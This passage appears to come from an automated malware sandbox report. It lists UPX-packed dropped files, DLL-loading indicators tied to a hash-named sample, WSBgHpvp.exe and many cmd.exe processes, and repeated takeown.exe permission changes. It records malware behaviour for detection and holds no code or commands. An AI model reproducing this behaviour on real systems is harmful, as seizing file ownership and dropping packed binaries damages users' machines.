behavioral1/files/0x00030000000131b9-801.dat upx behavioral1/files/0x00030000000131b9-803.dat upx behavioral1/files/0x00030000000131b9-808.dat upx behavioral1/files/0x00030000000131b9-810.dat upx behavioral1/files/0x00030000000131b9-811.dat upx behavioral1/files/0x00030000000131b9-813.dat upx behavioral1/files/0x00030000000131b9-818.dat upx behavioral1/files/0x00030000000131b9-820.dat upx behavioral1/files/0x00030000000131b9-821.dat upx behavioral1/files/0x00030000000131b9-823.dat upx behavioral1/files/0x00030000000131b9-828.dat upx behavioral1/files/0x00030000000131b9-830.dat upx behavioral1/files/0x00030000000131b9-831.dat upx behavioral1/files/0x00030000000131b9-833.dat upx behavioral1/files/0x00030000000131b9-838.dat upx behavioral1/files/0x00030000000131b9-840.dat upx behavioral1/files/0x00030000000131b9-841.dat upx behavioral1/files/0x00030000000131b9-843.dat upx behavioral1/files/0x00030000000131b9-848.dat upx behavioral1/files/0x00030000000131b9-850.dat upx behavioral1/files/0x00030000000131b9-851.dat upx behavioral1/files/0x00030000000131b9-853.dat upx behavioral1/files/0x00030000000131b9-858.dat upx behavioral1/files/0x00030000000131b9-860.dat upx behavioral1/files/0x00030000000131b9-861.dat upx behavioral1/files/0x00030000000131b9-863.dat upx behavioral1/files/0x00030000000131b9-868.dat upx behavioral1/files/0x00030000000131b9-870.dat upx behavioral1/files/0x00030000000131b9-871.dat upx behavioral1/files/0x00030000000131b9-873.dat upx behavioral1/files/0x00030000000131b9-878.dat upx behavioral1/files/0x00030000000131b9-880.dat upx behavioral1/files/0x00030000000131b9-881.dat upx behavioral1/files/0x00030000000131b9-883.dat upx behavioral1/files/0x00030000000131b9-888.dat upx behavioral1/files/0x00030000000131b9-890.dat upx behavioral1/files/0x00030000000131b9-891.dat upx behavioral1/files/0x00030000000131b9-893.dat upx behavioral1/files/0x00030000000131b9-898.dat upx behavioral1/files/0x00030000000131b9-900.dat upx behavioral1/files/0x00030000000131b9-901.dat upx behavioral1/files/0x00030000000131b9-903.dat upx behavioral1/files/0x00030000000131b9-908.dat upx behavioral1/files/0x00030000000131b9-910.dat upx behavioral1/files/0x00030000000131b9-911.dat upx behavioral1/files/0x00030000000131b9-913.dat upx behavioral1/files/0x00030000000131b9-918.dat upx behavioral1/files/0x00030000000131b9-920.dat upx behavioral1/files/0x00030000000131b9-921.dat upx behavioral1/files/0x00030000000131b9-923.dat upx behavioral1/files/0x00030000000131b9-928.dat upx behavioral1/files/0x00030000000131b9-930.dat upx behavioral1/files/0x00030000000131b9-931.dat upx behavioral1/files/0x00030000000131b9-933.dat upx behavioral1/files/0x00030000000131b9-938.dat upx behavioral1/files/0x00030000000131b9-940.dat upx behavioral1/files/0x00030000000131b9-941.dat upx behavioral1/files/0x00030000000131b9-943.dat upx behavioral1/files/0x00030000000131b9-948.dat upx behavioral1/files/0x00030000000131b9-950.dat upx behavioral1/files/0x00030000000131b9-951.dat upx behavioral1/files/0x00030000000131b9-953.dat upx behavioral1/files/0x00030000000131b9-958.dat upx behavioral1/files/0x00030000000131b9-960.dat upx behavioral1/files/0x00030000000131b9-961.dat upx behavioral1/files/0x00030000000131b9-963.dat upx behavioral1/files/0x00030000000131b9-968.dat upx behavioral1/files/0x00030000000131b9-970.dat upx behavioral1/files/0x00030000000131b9-971.dat upx behavioral1/files/0x00030000000131b9-973.dat upx behavioral1/files/0x00030000000131b9-978.dat upx behavioral1/files/0x00030000000131b9-980.dat upx behavioral1/files/0x00030000000131b9-981.dat upx behavioral1/files/0x00030000000131b9-983.dat upx behavioral1/files/0x00030000000131b9-988.dat upx behavioral1/files/0x00030000000131b9-990.dat upx behavioral1/files/0x00030000000131b9-991.dat upx behavioral1/files/0x00030000000131b9-993.dat upx behavioral1/files/0x00030000000131b9-998.dat upx behavioral1/files/0x00030000000131b9-1000.dat upx behavioral1/files/0x00030000000131b9-1001.dat upx behavioral1/files/0x00030000000131b9-1003.dat upx behavioral1/files/0x00030000000131b9-1008.dat upx behavioral1/files/0x00030000000131b9-1010.dat upx behavioral1/files/0x00030000000131b9-1011.dat upx behavioral1/files/0x00030000000131b9-1013.dat upx behavioral1/files/0x00030000000131b9-1018.dat upx behavioral1/files/0x00030000000131b9-1020.dat upx behavioral1/files/0x00030000000131b9-1021.dat upx behavioral1/files/0x00030000000131b9-1023.dat upx behavioral1/files/0x00030000000131b9-1028.dat upx behavioral1/files/0x00030000000131b9-1030.dat upx behavioral1/files/0x00030000000131b9-1031.dat upx behavioral1/files/0x00030000000131b9-1033.dat upx behavioral1/files/0x00030000000131b9-1038.dat upx behavioral1/files/0x00030000000131b9-1040.dat upx behavioral1/files/0x00030000000131b9-1041.dat upx behavioral1/files/0x00030000000131b9-1043.dat upx behavioral1/files/0x00030000000131b9-1048.dat upx behavioral1/files/0x00030000000131b9-1050.dat upx behavioral1/files/0x00030000000131b9-1051.dat upx behavioral1/files/0x00030000000131b9-1053.dat upx behavioral1/files/0x00030000000131b9-1058.dat upx behavioral1/files/0x00030000000131b9-1060.dat upx behavioral1/files/0x00030000000131b9-1061.dat upx behavioral1/files/0x00030000000131b9-1063.dat upx behavioral1/files/0x00030000000131b9-1068.dat upx behavioral1/files/0x00030000000131b9-1070.dat upx behavioral1/files/0x00030000000131b9-1071.dat upx behavioral1/files/0x00030000000131b9-1073.dat upx behavioral1/files/0x00030000000131b9-1078.dat upx behavioral1/files/0x00030000000131b9-1080.dat upx behavioral1/files/0x00030000000131b9-1081.dat upx behavioral1/files/0x00030000000131b9-1083.dat upx behavioral1/files/0x00030000000131b9-1088.dat upx behavioral1/files/0x00030000000131b9-1090.dat upx behavioral1/files/0x00030000000131b9-1091.dat upx behavioral1/files/0x00030000000131b9-1093.dat upx behavioral1/files/0x00030000000131b9-1098.dat upx behavioral1/files/0x00030000000131b9-1100.dat upx behavioral1/files/0x00030000000131b9-1101.dat upx behavioral1/files/0x00030000000131b9-1103.dat upx behavioral1/files/0x00030000000131b9-1108.dat upx behavioral1/files/0x00030000000131b9-1110.dat upx behavioral1/files/0x00030000000131b9-1112.dat upx behavioral1/files/0x00030000000131b9-1114.dat upx behavioral1/files/0x00030000000131b9-1119.dat upx behavioral1/files/0x00030000000131b9-1121.dat upx behavioral1/files/0x00030000000131b9-1122.dat upx behavioral1/files/0x00030000000131b9-1124.dat upx behavioral1/files/0x00030000000131b9-1129.dat upx behavioral1/files/0x00030000000131b9-1131.dat upx behavioral1/files/0x00030000000131b9-1132.dat upx behavioral1/files/0x00030000000131b9-1134.dat upx behavioral1/files/0x00030000000131b9-1139.dat upx behavioral1/files/0x00030000000131b9-1141.dat upx behavioral1/files/0x00030000000131b9-1142.dat upx behavioral1/files/0x00030000000131b9-1144.dat upx behavioral1/files/0x00030000000131b9-1149.dat upx behavioral1/files/0x00030000000131b9-1151.dat upx behavioral1/files/0x00030000000131b9-1152.dat upx behavioral1/files/0x00030000000131b9-1154.dat upx behavioral1/files/0x00030000000131b9-1159.dat upx behavioral1/files/0x00030000000131b9-1161.dat upx behavioral1/files/0x00030000000131b9-1162.dat upx behavioral1/files/0x00030000000131b9-1164.dat upx behavioral1/files/0x00030000000131b9-1169.dat upx behavioral1/files/0x00030000000131b9-1171.dat upx behavioral1/files/0x00030000000131b9-1172.dat upx behavioral1/files/0x00030000000131b9-1174.dat upx behavioral1/files/0x00030000000131b9-1179.dat upx behavioral1/files/0x00030000000131b9-1181.dat upx behavioral1/files/0x00030000000131b9-1182.dat upx behavioral1/files/0x00030000000131b9-1184.dat upx behavioral1/files/0x00030000000131b9-1189.dat upx behavioral1/files/0x00030000000131b9-1191.dat upx behavioral1/files/0x00030000000131b9-1192.dat upx behavioral1/files/0x00030000000131b9-1194.dat upx behavioral1/files/0x00030000000131b9-1199.dat upx behavioral1/files/0x00030000000131b9-1201.dat upx behavioral1/files/0x00030000000131b9-1202.dat upx behavioral1/files/0x00030000000131b9-1204.dat upx behavioral1/files/0x00030000000131b9-1209.dat upx behavioral1/files/0x00030000000131b9-1211.dat upx behavioral1/files/0x00030000000131b9-1212.dat upx behavioral1/files/0x00030000000131b9-1214.dat upx behavioral1/files/0x00030000000131b9-1219.dat upx behavioral1/files/0x00030000000131b9-1221.dat upx behavioral1/files/0x00030000000131b9-1222.dat upx behavioral1/files/0x00030000000131b9-1224.dat upx behavioral1/files/0x00030000000131b9-1229.dat upx behavioral1/files/0x00030000000131b9-1231.dat upx behavioral1/files/0x00030000000131b9-1232.dat upx behavioral1/files/0x00030000000131b9-1234.dat upx behavioral1/files/0x00030000000131b9-1239.dat upx behavioral1/files/0x00030000000131b9-1241.dat upx behavioral1/files/0x00030000000131b9-1242.dat upx behavioral1/files/0x00030000000131b9-1244.dat upx behavioral1/files/0x00030000000131b9-1249.dat upx behavioral1/files/0x00030000000131b9-1251.dat upx behavioral1/files/0x00030000000131b9-1252.dat upx behavioral1/files/0x00030000000131b9-1254.dat upx behavioral1/files/0x00030000000131b9-1259.dat upx behavioral1/files/0x00030000000131b9-1261.dat upx behavioral1/files/0x00030000000131b9-1262.dat upx behavioral1/files/0x00030000000131b9-1264.dat upx behavioral1/files/0x00030000000131b9-1269.dat upx behavioral1/files/0x00030000000131b9-1271.dat upx behavioral1/files/0x00030000000131b9-1272.dat upx behavioral1/files/0x00030000000131b9-1274.dat upx behavioral1/files/0x00030000000131b9-1279.dat upx behavioral1/files/0x00030000000131b9-1281.dat upx behavioral1/files/0x00030000000131b9-1282.dat upx behavioral1/files/0x00030000000131b9-1284.dat upx behavioral1/files/0x00030000000131b9-1289.dat upx behavioral1/files/0x00030000000131b9-1291.dat upx behavioral1/files/0x00030000000131b9-1292.dat upx behavioral1/files/0x00030000000131b9-1294.dat upx behavioral1/files/0x00030000000131b9-1299.dat upx behavioral1/files/0x00030000000131b9-1302.dat upx behavioral1/files/0x00030000000131b9-1303.dat upx behavioral1/files/0x00030000000131b9-1305.dat upx behavioral1/files/0x00030000000131b9-1311.dat upx behavioral1/files/0x00030000000131b9-1313.dat upx behavioral1/files/0x00030000000131b9-1315.dat upx behavioral1/files/0x00030000000131b9-1317.dat upx behavioral1/files/0x00030000000131b9-1322.dat upx behavioral1/files/0x00030000000131b9-1324.dat upx behavioral1/files/0x00030000000131b9-1325.dat upx behavioral1/files/0x00030000000131b9-1327.dat upx behavioral1/files/0x00030000000131b9-1332.dat upx behavioral1/files/0x00030000000131b9-1334.dat upx behavioral1/files/0x00030000000131b9-1335.dat upx behavioral1/files/0x00030000000131b9-1337.dat upx behavioral1/files/0x00030000000131b9-1342.dat upx behavioral1/files/0x00030000000131b9-1344.dat upx behavioral1/files/0x00030000000131b9-1345.dat upx behavioral1/files/0x00030000000131b9-1347.dat upx behavioral1/files/0x00030000000131b9-1352.dat upx behavioral1/files/0x00030000000131b9-1354.dat upx behavioral1/files/0x00030000000131b9-1355.dat upx behavioral1/files/0x00030000000131b9-1357.dat upx behavioral1/files/0x00030000000131b9-1362.dat upx behavioral1/files/0x00030000000131b9-1364.dat upx behavioral1/files/0x00030000000131b9-1365.dat upx behavioral1/files/0x00030000000131b9-1367.dat upx behavioral1/files/0x00030000000131b9-1372.dat upx behavioral1/files/0x00030000000131b9-1374.dat upx behavioral1/files/0x00030000000131b9-1375.dat upx behavioral1/files/0x00030000000131b9-1377.dat upx behavioral1/files/0x00030000000131b9-1382.dat upx behavioral1/files/0x00030000000131b9-1384.dat upx behavioral1/files/0x00030000000131b9-1385.dat upx behavioral1/files/0x00030000000131b9-1387.dat upx behavioral1/files/0x00030000000131b9-1392.dat upx behavioral1/files/0x00030000000131b9-1394.dat upx behavioral1/files/0x00030000000131b9-1395.dat upx behavioral1/files/0x00030000000131b9-1397.dat upx behavioral1/files/0x00030000000131b9-1402.dat upx behavioral1/files/0x00030000000131b9-1404.dat upx behavioral1/files/0x00030000000131b9-1405.dat upx behavioral1/files/0x00030000000131b9-1407.dat upx behavioral1/files/0x00030000000131b9-1412.dat upx behavioral1/files/0x00030000000131b9-1414.dat upx behavioral1/files/0x00030000000131b9-1415.dat upx behavioral1/files/0x00030000000131b9-1417.dat upx behavioral1/files/0x00030000000131b9-1422.dat upx behavioral1/files/0x00030000000131b9-1424.dat upx behavioral1/files/0x00030000000131b9-1425.dat upx behavioral1/files/0x00030000000131b9-1427.dat upx behavioral1/files/0x00030000000131b9-1432.dat upx behavioral1/files/0x00030000000131b9-1434.dat upx behavioral1/files/0x00030000000131b9-1435.dat upx behavioral1/files/0x00030000000131b9-1437.dat upx behavioral1/files/0x00030000000131b9-1442.dat upx behavioral1/files/0x00030000000131b9-1444.dat upx behavioral1/files/0x00030000000131b9-1445.dat upx behavioral1/files/0x00030000000131b9-1447.dat upx behavioral1/files/0x00030000000131b9-1452.dat upx behavioral1/files/0x00030000000131b9-1454.dat upx behavioral1/files/0x00030000000131b9-1455.dat upx behavioral1/files/0x00030000000131b9-1457.dat upx behavioral1/files/0x00030000000131b9-1462.dat upx behavioral1/files/0x00030000000131b9-1464.dat upx behavioral1/files/0x00030000000131b9-1465.dat upx behavioral1/files/0x00030000000131b9-1467.dat upx behavioral1/files/0x00030000000131b9-1472.dat upx behavioral1/files/0x00030000000131b9-1474.dat upx behavioral1/files/0x00030000000131b9-1475.dat upx behavioral1/files/0x00030000000131b9-1477.dat upx behavioral1/files/0x00030000000131b9-1482.dat upx behavioral1/files/0x00030000000131b9-1484.dat upx behavioral1/files/0x00030000000131b9-1485.dat upx behavioral1/files/0x00030000000131b9-1487.dat upx behavioral1/files/0x00030000000131b9-1492.dat upx behavioral1/files/0x00030000000131b9-1494.dat upx behavioral1/files/0x00030000000131b9-1495.dat upx behavioral1/files/0x00030000000131b9-1497.dat upx behavioral1/files/0x00030000000131b9-1502.dat upx behavioral1/files/0x00030000000131b9-1504.dat upx behavioral1/files/0x00030000000131b9-1505.dat upx behavioral1/files/0x00030000000131b9-1507.dat upx behavioral1/files/0x00030000000131b9-1512.dat upx behavioral1/files/0x00030000000131b9-1514.dat upx behavioral1/files/0x00030000000131b9-1515.dat upx behavioral1/files/0x00030000000131b9-1517.dat upx behavioral1/files/0x00030000000131b9-1522.dat upx behavioral1/files/0x00030000000131b9-1524.dat upx behavioral1/files/0x00030000000131b9-1525.dat upx behavioral1/files/0x00030000000131b9-1527.dat upx behavioral1/files/0x00030000000131b9-1532.dat upx behavioral1/files/0x00030000000131b9-1534.dat upx behavioral1/files/0x00030000000131b9-1535.dat upx behavioral1/files/0x00030000000131b9-1537.dat upx behavioral1/files/0x00030000000131b9-1542.dat upx behavioral1/files/0x00030000000131b9-1544.dat upx behavioral1/files/0x00030000000131b9-1545.dat upx behavioral1/files/0x00030000000131b9-1547.dat upx behavioral1/files/0x00030000000131b9-1552.dat upx behavioral1/files/0x00030000000131b9-1554.dat upx behavioral1/files/0x00030000000131b9-1555.dat upx behavioral1/files/0x00030000000131b9-1557.dat upx behavioral1/files/0x00030000000131b9-1562.dat upx behavioral1/files/0x00030000000131b9-1564.dat upx behavioral1/files/0x00030000000131b9-1565.dat upx behavioral1/files/0x00030000000131b9-1567.dat upx behavioral1/files/0x00030000000131b9-1572.dat upx behavioral1/files/0x00030000000131b9-1574.dat upx behavioral1/files/0x00030000000131b9-1575.dat upx behavioral1/files/0x00030000000131b9-1577.dat upx behavioral1/files/0x00030000000131b9-1582.dat upx behavioral1/files/0x00030000000131b9-1584.dat upx behavioral1/files/0x00030000000131b9-1585.dat upx behavioral1/files/0x00030000000131b9-1587.dat upx behavioral1/files/0x00030000000131b9-1592.dat upx behavioral1/files/0x00030000000131b9-1594.dat upx behavioral1/files/0x00030000000131b9-1595.dat upx behavioral1/files/0x00030000000131b9-1597.dat upx behavioral1/files/0x00030000000131b9-1602.dat upx behavioral1/files/0x00030000000131b9-1604.dat upx behavioral1/files/0x00030000000131b9-1605.dat upx behavioral1/files/0x00030000000131b9-1607.dat upx behavioral1/files/0x00030000000131b9-1612.dat upx behavioral1/files/0x00030000000131b9-1614.dat upx behavioral1/files/0x00030000000131b9-1615.dat upx behavioral1/files/0x00030000000131b9-1617.dat upx behavioral1/files/0x00030000000131b9-1622.dat upx behavioral1/files/0x00030000000131b9-1624.dat upx behavioral1/files/0x00030000000131b9-1625.dat upx behavioral1/files/0x00030000000131b9-1627.dat upx behavioral1/files/0x00030000000131b9-1632.dat upx behavioral1/files/0x00030000000131b9-1634.dat upx behavioral1/files/0x00030000000131b9-1635.dat upx behavioral1/files/0x00030000000131b9-1637.dat upx behavioral1/files/0x00030000000131b9-1642.dat upx behavioral1/files/0x00030000000131b9-1644.dat upx behavioral1/files/0x00030000000131b9-1645.dat upx behavioral1/files/0x00030000000131b9-1647.dat upx behavioral1/files/0x00030000000131b9-1652.dat upx behavioral1/files/0x00030000000131b9-1654.dat upx behavioral1/files/0x00030000000131b9-1655.dat upx behavioral1/files/0x00030000000131b9-1657.dat upx behavioral1/files/0x00030000000131b9-1662.dat upx behavioral1/files/0x00030000000131b9-1664.dat upx behavioral1/files/0x00030000000131b9-1665.dat upx behavioral1/files/0x00030000000131b9-1667.dat upx behavioral1/files/0x00030000000131b9-1672.dat upx behavioral1/files/0x00030000000131b9-1674.dat upx behavioral1/files/0x00030000000131b9-1675.dat upx behavioral1/files/0x00030000000131b9-1677.dat upx behavioral1/files/0x00030000000131b9-1682.dat upx behavioral1/files/0x00030000000131b9-1684.dat upx behavioral1/files/0x00030000000131b9-1685.dat upx behavioral1/files/0x00030000000131b9-1687.dat upx behavioral1/files/0x00030000000131b9-1692.dat upx behavioral1/files/0x00030000000131b9-1694.dat upx behavioral1/files/0x00030000000131b9-1695.dat upx behavioral1/files/0x00030000000131b9-1697.dat upx behavioral1/files/0x00030000000131b9-1702.dat upx behavioral1/files/0x00030000000131b9-1704.dat upx behavioral1/files/0x00030000000131b9-1705.dat upx behavioral1/files/0x00030000000131b9-1707.dat upx behavioral1/files/0x00030000000131b9-1712.dat upx behavioral1/files/0x00030000000131b9-1714.dat upx behavioral1/files/0x00030000000131b9-1715.dat upx behavioral1/files/0x00030000000131b9-1717.dat upx behavioral1/files/0x00030000000131b9-1722.dat upx behavioral1/files/0x00030000000131b9-1724.dat upx behavioral1/files/0x00030000000131b9-1725.dat upx behavioral1/files/0x00030000000131b9-1727.dat upx behavioral1/files/0x00030000000131b9-1732.dat upx behavioral1/files/0x00030000000131b9-1734.dat upx behavioral1/files/0x00030000000131b9-1735.dat upx behavioral1/files/0x00030000000131b9-1737.dat upx behavioral1/files/0x00030000000131b9-1742.dat upx behavioral1/files/0x00030000000131b9-1744.dat upx behavioral1/files/0x00030000000131b9-1745.dat upx behavioral1/files/0x00030000000131b9-1747.dat upx behavioral1/files/0x00030000000131b9-1752.dat upx behavioral1/files/0x00030000000131b9-1754.dat upx behavioral1/files/0x00030000000131b9-1755.dat upx behavioral1/files/0x00030000000131b9-1757.dat upx behavioral1/files/0x00030000000131b9-1762.dat upx behavioral1/files/0x00030000000131b9-1764.dat upx behavioral1/files/0x00030000000131b9-1765.dat upx behavioral1/files/0x00030000000131b9-1767.dat upx behavioral1/files/0x00030000000131b9-1772.dat upx behavioral1/files/0x00030000000131b9-1774.dat upx behavioral1/files/0x00030000000131b9-1775.dat upx behavioral1/files/0x00030000000131b9-1777.dat upx behavioral1/files/0x00030000000131b9-1782.dat upx behavioral1/files/0x00030000000131b9-1784.dat upx behavioral1/files/0x00030000000131b9-1785.dat upx behavioral1/files/0x00030000000131b9-1787.dat upx behavioral1/files/0x00030000000131b9-1792.dat upx behavioral1/files/0x00030000000131b9-1794.dat upx behavioral1/files/0x00030000000131b9-1795.dat upx behavioral1/files/0x00030000000131b9-1797.dat upx behavioral1/files/0x00030000000131b9-1802.dat upx behavioral1/files/0x00030000000131b9-1804.dat upx behavioral1/files/0x00030000000131b9-1805.dat upx behavioral1/files/0x00030000000131b9-1807.dat upx behavioral1/files/0x00030000000131b9-1812.dat upx behavioral1/files/0x00030000000131b9-1814.dat upx behavioral1/files/0x00030000000131b9-1815.dat upx behavioral1/files/0x00030000000131b9-1817.dat upx -
Loads dropped DLL 360 IoCs
pid Process 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 2016 cmd.exe 1536 cmd.exe 856 WSBgHpvp.exe 336 cmd.exe 1748 cmd.exe 1040 cmd.exe 1120 cmd.exe 1944 cmd.exe 1036 cmd.exe 1268 cmd.exe 1288 cmd.exe 612 cmd.exe 912 cmd.exe 1368 cmd.exe 936 cmd.exe 1768 cmd.exe 1216 cmd.exe 1428 cmd.exe 1640 cmd.exe 1464 cmd.exe 1036 cmd.exe 1368 cmd.exe 1216 cmd.exe 1164 cmd.exe 2020 cmd.exe 1880 cmd.exe 1536 cmd.exe 960 cmd.exe 1444 cmd.exe 748 cmd.exe 1368 cmd.exe 1848 cmd.exe 1576 cmd.exe 1400 cmd.exe 544 cmd.exe 788 cmd.exe 960 cmd.exe 820 cmd.exe 1460 cmd.exe 1500 cmd.exe 1220 cmd.exe 1032 cmd.exe 1444 cmd.exe 1248 cmd.exe 936 cmd.exe 604 cmd.exe 1536 cmd.exe 1848 cmd.exe 932 cmd.exe 1164 cmd.exe 1748 cmd.exe 1608 cmd.exe 1992 cmd.exe 1640 cmd.exe 1864 cmd.exe 1880 cmd.exe 1724 cmd.exe 1580 cmd.exe 1536 cmd.exe 432 cmd.exe 1608 cmd.exe 1720 cmd.exe 1640 cmd.exe 1992 cmd.exe 1548 cmd.exe 1040 cmd.exe 748 cmd.exe 912 cmd.exe 1388 cmd.exe 1268 cmd.exe 1608 cmd.exe 1752 cmd.exe 1640 cmd.exe 740 cmd.exe 924 cmd.exe 816 cmd.exe 1064 cmd.exe 520 cmd.exe 1220 cmd.exe 1388 cmd.exe 860 cmd.exe 1608 cmd.exe 820 cmd.exe 932 cmd.exe 1120 cmd.exe 520 cmd.exe 1944 cmd.exe 1796 cmd.exe 788 cmd.exe 1724 cmd.exe 1816 cmd.exe 1428 cmd.exe 604 cmd.exe 1020 cmd.exe 1196 cmd.exe 1832 cmd.exe 1864 cmd.exe 932 cmd.exe 1036 cmd.exe 520 cmd.exe 1804 cmd.exe 432 cmd.exe 1312 cmd.exe 1724 cmd.exe 316 cmd.exe 1428 cmd.exe 1056 cmd.exe 1248 cmd.exe 544 cmd.exe 1488 cmd.exe 1848 cmd.exe 816 cmd.exe 1548 cmd.exe 1032 cmd.exe 1752 cmd.exe 1804 cmd.exe 944 cmd.exe 1220 cmd.exe 284 cmd.exe 1188 cmd.exe 1804 cmd.exe 2020 cmd.exe 1220 cmd.exe 324 cmd.exe 748 cmd.exe 1548 cmd.exe 1120 cmd.exe 1248 cmd.exe 944 cmd.exe 872 cmd.exe 708 cmd.exe 1832 cmd.exe 1164 cmd.exe 1728 cmd.exe 1480 cmd.exe 932 cmd.exe 604 cmd.exe 1828 cmd.exe 1412 cmd.exe 1488 cmd.exe 292 cmd.exe 1572 cmd.exe 1056 cmd.exe 612 cmd.exe 652 cmd.exe 1960 cmd.exe 1480 cmd.exe 1672 cmd.exe 1288 cmd.exe 1528 cmd.exe 1412 cmd.exe 1948 cmd.exe 1652 cmd.exe 1248 cmd.exe 1972 cmd.exe 1312 cmd.exe 1400 cmd.exe 744 cmd.exe 1480 cmd.exe 1444 cmd.exe 2020 cmd.exe 708 cmd.exe 1728 cmd.exe 1672 cmd.exe 1120 cmd.exe 1488 cmd.exe 1164 cmd.exe 652 cmd.exe 1848 cmd.exe 1664 cmd.exe 872 cmd.exe 1132 cmd.exe 1196 cmd.exe 1412 cmd.exe 324 cmd.exe 1444 cmd.exe 1164 cmd.exe 708 cmd.exe 912 cmd.exe 1828 cmd.exe 1428 cmd.exe 1464 cmd.exe 1460 cmd.exe 1032 cmd.exe 324 cmd.exe 612 cmd.exe 996 cmd.exe 1572 cmd.exe 1816 cmd.exe 1412 cmd.exe 1628 cmd.exe 324 cmd.exe 744 cmd.exe 1020 cmd.exe 1944 cmd.exe 932 cmd.exe 996 cmd.exe 432 cmd.exe 748 cmd.exe 1528 cmd.exe 1832 cmd.exe 604 cmd.exe 820 cmd.exe 1132 cmd.exe 1056 cmd.exe 1412 cmd.exe 1652 cmd.exe 1816 cmd.exe 996 cmd.exe 944 cmd.exe 748 cmd.exe 1948 cmd.exe 324 cmd.exe 1460 cmd.exe 652 cmd.exe 1664 cmd.exe 2020 cmd.exe 1728 cmd.exe 1032 cmd.exe 1268 cmd.exe 1824 cmd.exe 996 cmd.exe 204 cmd.exe 1488 cmd.exe 1572 cmd.exe 1288 cmd.exe 1412 cmd.exe 1816 cmd.exe 1804 cmd.exe 996 cmd.exe 1032 cmd.exe 1488 cmd.exe 652 cmd.exe 1728 cmd.exe 1672 cmd.exe 872 cmd.exe 324 cmd.exe 1948 cmd.exe 292 cmd.exe 1628 cmd.exe 956 cmd.exe 1848 cmd.exe 1572 cmd.exe 236 cmd.exe 1412 cmd.exe 1056 cmd.exe 1804 cmd.exe 820 cmd.exe 1292 cmd.exe 1728 cmd.exe 1164 cmd.exe 996 cmd.exe 820 cmd.exe 204 cmd.exe 1816 cmd.exe 1032 cmd.exe 1916 cmd.exe 1488 cmd.exe 1444 cmd.exe 324 cmd.exe 1032 cmd.exe 792 cmd.exe 1220 cmd.exe 1940 cmd.exe 212 cmd.exe 520 cmd.exe 1944 cmd.exe 1628 cmd.exe 1020 cmd.exe 316 cmd.exe 912 cmd.exe 216 cmd.exe 1960 cmd.exe 208 cmd.exe 1528 cmd.exe 932 cmd.exe 1132 cmd.exe 1040 cmd.exe 872 cmd.exe 1236 cmd.exe 1488 cmd.exe 208 cmd.exe 336 cmd.exe 932 cmd.exe 1960 cmd.exe 1728 cmd.exe 1640 cmd.exe 1236 cmd.exe 1580 cmd.exe 1816 cmd.exe 1848 cmd.exe 204 cmd.exe 1444 cmd.exe 220 cmd.exe 1132 cmd.exe 652 cmd.exe 1484 cmd.exe 1828 cmd.exe 516 cmd.exe 204 cmd.exe 1428 cmd.exe 220 cmd.exe 1040 cmd.exe 652 cmd.exe 1236 cmd.exe 1652 cmd.exe 1132 cmd.exe 1880 cmd.exe 1548 cmd.exe 292 cmd.exe 516 cmd.exe 1804 cmd.exe 520 cmd.exe 1652 cmd.exe 1040 cmd.exe 1880 cmd.exe 1444 cmd.exe 292 cmd.exe 216 cmd.exe 1828 cmd.exe 1768 cmd.exe 224 cmd.exe 1940 cmd.exe 228 cmd.exe 612 cmd.exe 1824 cmd.exe 652 cmd.exe 912 cmd.exe 1292 cmd.exe 1628 cmd.exe 216 cmd.exe 820 cmd.exe 1796 cmd.exe 1428 cmd.exe 1832 cmd.exe 996 cmd.exe 1268 cmd.exe 1628 cmd.exe 652 cmd.exe 748 cmd.exe 316 cmd.exe 1824 cmd.exe 612 cmd.exe 212 cmd.exe 1672 cmd.exe 208 cmd.exe 1292 cmd.exe 820 cmd.exe 216 cmd.exe 1428 cmd.exe 1040 cmd.exe 212 cmd.exe 1916 cmd.exe 1880 cmd.exe 1600 cmd.exe 860 cmd.exe 1944 cmd.exe 1132 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 1120 takeown.exe 1236 takeown.exe 932 takeown.exe 1188 takeown.exe 872 takeown.exe 612 takeown.exe 292 takeown.exe 1040 takeown.exe 1056 takeown.exe 1652 takeown.exe 1608 takeown.exe 936 takeown.exe 224 takeown.exe 1220 takeown.exe 1292 takeown.exe 1056 takeown.exe 708 takeown.exe 1288 takeown.exe 1196 takeown.exe 1796 takeown.exe 944 takeown.exe 1268 takeown.exe 1040 takeown.exe 1572 takeown.exe 1616 takeown.exe 1768 takeown.exe 1312 takeown.exe 1960 takeown.exe 1832 takeown.exe 820 takeown.exe 1600 takeown.exe 1048 takeown.exe 1064 takeown.exe 520 takeown.exe 1488 takeown.exe 1992 takeown.exe 1288 takeown.exe 1628 takeown.exe 912 takeown.exe 1132 takeown.exe 1032 takeown.exe 1608 takeown.exe 1312 takeown.exe 788 takeown.exe 1720 takeown.exe 1760 takeown.exe 1064 takeown.exe 1036 takeown.exe 1440 takeown.exe 364 takeown.exe 1484 takeown.exe 324 takeown.exe 1048 takeown.exe 1488 takeown.exe 1972 takeown.exe 268 takeown.exe 1864 takeown.exe 1992 takeown.exe 1460 takeown.exe 432 takeown.exe 936 takeown.exe 1464 takeown.exe 1040 takeown.exe 1064 takeown.exe 1548 takeown.exe 1992 takeown.exe 1196 takeown.exe 1880 takeown.exe 1196 takeown.exe 872 takeown.exe 432 takeown.exe 1444 takeown.exe 1768 takeown.exe 1220 takeown.exe 1992 takeown.exe 1864 takeown.exe 1368 takeown.exe 284 takeown.exe 268 takeown.exe 1916 takeown.exe 1040 takeown.exe 1292 takeown.exe 1548 takeown.exe 1236 takeown.exe 1796 takeown.exe 516 takeown.exe 1488 takeown.exe 1064 takeown.exe 1944 takeown.exe 1960 takeown.exe 1548 takeown.exe 936 takeown.exe 520 takeown.exe 1460 takeown.exe 1640 takeown.exe 612 takeown.exe 956 takeown.exe 520 takeown.exe 324 takeown.exe 1460 takeown.exe 1164 takeown.exe 792 takeown.exe 1188 takeown.exe 1728 takeown.exe 1880 takeown.exe 1164 takeown.exe 1132 takeown.exe 1576 takeown.exe 924 takeown.exe 520 takeown.exe 872 takeown.exe 1944 takeown.exe 1040 takeown.exe 324 takeown.exe 1828 takeown.exe 1616 takeown.exe 1480 takeown.exe 1020 takeown.exe 1768 takeown.exe 1528 takeown.exe 924 takeown.exe 996 takeown.exe 744 takeown.exe 1020 takeown.exe 1828 takeown.exe 336 takeown.exe 1960 takeown.exe 872 takeown.exe 744 takeown.exe 1220 takeown.exe 940 takeown.exe 1768 takeown.exe 788 takeown.exe 912 takeown.exe 1916 takeown.exe 